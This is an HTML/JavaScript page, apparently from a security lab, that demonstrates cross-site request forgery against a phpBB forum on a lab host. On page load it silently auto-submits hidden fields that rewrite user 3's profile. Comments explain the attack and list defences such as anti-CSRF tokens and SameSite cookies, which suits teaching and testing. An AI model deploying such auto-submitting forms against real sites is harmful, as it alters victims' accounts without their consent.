- <html><body><h1>
- Javascript </h1>
- <script type="text/javascript">
- // Creates a <form>, fills it with the markup passed in `fields`, attaches it to the
- // document body and submits it as a POST to `url` in the current window ('_self').
- //   url    - value assigned to the form's action.
- //   fields - string of HTML parsed into the form's children via innerHTML.
- // The submission is an ordinary browser form POST, so the browser adds any cookies it
- // holds for the target site, subject to their SameSite attribute. The receiving endpoint
- // therefore cannot treat a session cookie alone as proof that the user intended the request.
- function post(url, fields)
- {
-   var form = document.createElement('form');
-   form.method = 'post';
-   form.target = '_self';
-   form.action = url;
-   // `fields` is parsed as HTML, not escaped; in this file it is only ever the
-   // string assembled by csrf_hack().
-   form.innerHTML = fields;
-   document.body.appendChild(form);
-   form.submit();
- }
- // Lab demonstration of a cross-site request forgery (CSRF) page: concatenates a string of
- // hidden <input> elements with fixed values and hands it to post(), together with the lab
- // host URL, so the form is submitted without the visitor filling anything in.
- // Takes no arguments and returns nothing.
- //
- // Defender's reading: every value sent is a constant that the page author could write
- // down in advance. Nothing in the request is unpredictable to a third party. A per-session
- // anti-CSRF token that the server checks on state-changing POSTs, SameSite cookies, and
- // Origin/Referer validation are the standard controls that make such a request fail.
- function csrf_hack()
- {
- // NOTE(review): `fields` is declared without an initial value, so the first `+=` appends
- // to `undefined` and the resulting string starts with the literal text "undefined".
- var fields;
- fields +="<input type='hidden' name='username' value='alice'>";
- fields +="<input type='hidden' name='email' value='alice%40seed.com'>";
- // The commented-out inputs below are left as the author wrote them; presumably they are
- // the remaining fields of the target's profile form - confirm against the lab application.
- // fields +="<input type='hidden' name='cur_password' value=''>";
- // fields +="<input type='hidden' name='new_password' value=''>";
- // fields +="<input type='hidden' name='password_confirm' value=''>";
- // fields +="<input type='hidden' name='icq' value=''>";
- // fields +="<input type='hidden' name='aim' value=''>";
- // fields +="<input type='hidden' name='msn' value=''>";
- // fields +="<input type='hidden' name='yim' value=''>";
- fields +="<input type='hidden' name='website' value='Hacked.com'>";
- // fields +="<input type='hidden' name='location' value='World'>";
- // fields +="<input type='hidden' name='occupation' value=''>";
- // fields +="<input type='hidden' name='interests' value='Hacking'>";
- // fields +="<input type='hidden' name='signature' value=''>";
- // fields +="<input type='hidden' name='viewemail' value='0'>";
- // fields +="<input type='hidden' name='hideonline' value='0'>";
- // fields +="<input type='hidden' name='notifyreply' value='0'>";
- // fields +="<input type='hidden' name='notifypm' value='1'>";
- // fields +="<input type='hidden' name='popup_pm' value='1'>";
- // fields +="<input type='hidden' name='attachsig' value='1'>";
- // fields +="<input type='hidden' name='allowbbcode' value='1'>";
- // fields +="<input type='hidden' name='allowhtml' value='0'>";
- // fields +="<input type='hidden' name='allowsmilies' value='1'>";
- // fields +="<input type='hidden' name='language' value='english'>";
- // fields +="<input type='hidden' name='style' value='1'>";
- // fields +="<input type='hidden' name='timezone' value='0'>";
- // fields +="<input type='hidden' name='dateformat' value='D+M+d%2C+Y+g%3Ai+a'>";
- // fields +="<input type='hidden' name='mode' value='editprofile'>";
- fields +="<input type='hidden' name='agreed' value='true'>";
- fields +="<input type='hidden' name='coppa' value='0'>";
- // NOTE(review): the account is named by a fixed `user_id` in the request body. On the
- // server side the account to modify should come from the authenticated session, not from
- // a client-supplied field - verify how the lab application resolves it.
- fields +="<input type='hidden' name='user_id' value='3'>";
- fields +="<input type='hidden' name='current_email' value='alice%40seed.com'>";
- fields +="<input type='hidden' name='Submit' value='Submit'>";
- fields +="<input type='hidden' name='reset' class='liteoption'/>";
- // Hands the assembled markup and the lab host URL to post(), which builds and submits the form.
- post('http://www.csrflabphpbb.com/',fields);
- }
- // Runs csrf_hack() from the window's load event, so the request is issued as soon as the
- // page has loaded, with no click or other user action. A server therefore cannot infer
- // user intent from the mere arrival of a POST.
- window.onload = function () {
-   csrf_hack();
- };
- </script>
- </body>
- </html>